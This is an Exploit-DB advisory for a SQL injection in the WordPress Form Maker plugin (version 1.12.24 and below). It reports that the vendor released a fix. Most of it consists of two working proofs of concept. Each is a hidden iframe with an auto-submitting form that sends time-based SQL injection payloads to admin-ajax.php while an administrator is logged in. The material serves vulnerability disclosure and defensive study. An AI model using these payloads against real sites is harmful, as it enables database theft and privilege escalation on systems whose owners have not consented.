WordPress Form Maker Plugin 1.12.24 - SQL Injection

EDB-ID: 44853
Author: defensecode
Published: 2018-06-07
CVE: N/A
Type: Webapps
Platform: PHP
Vulnerable App: N/A

 # Date: 2018-06-07 
# Author: Neven Biruski
# Software: WordPress Form Maker plugin
# https://wordpress.org/plugins/form-maker/
# Version: 1.12.24 and below
# Vendor Status: Vendor contacted, update released

# The easiest way to reproduce the SQL injection vulnerabilities is to
# open the presented HTML/JavaScript snippet in your browser while being
# logged in as administrator or another user that is authorized to
# access the plugin settings page. Users that do not have full
# administrative privileges could abuse the database access the
# vulnerabilities provide to either escalate their privileges or obtain
# and modify database contents they were not supposed to be able to.

# PoC 1

<iframe style="display:none" name="invisible"></iframe>
<form id="form" method="POST" action="http://vulnerablesite.com/wp-admin/admin-ajax.php?action=FormMakerSQLMapping&task=db_table_struct"
target="invisible">
<input type="hidden" name="name" value="wp_users WHERE 42=42 AND SLEEP(42)--;"/>
</form>
<script>
document.getElementById("form").submit();
sleep(3000);
</script>

# PoC 2

<iframe style="display:none" name="invisible"></iframe>
<form id="form" method="POST" action="http://vulnerablesite.com/wp-admin/admin-ajax.php?form_id=6&send_header=0&action=generete_csv&limitstart=0"
target="invisible">
<input type="hidden" name="search_labels" value="2) AND (SELECT * FROM (SELECT(SLEEP(42)))XXX)-- XXX"/>
</form>
<script>
document.getElementById("form").submit();
sleep(3000);
</script>

Related Posts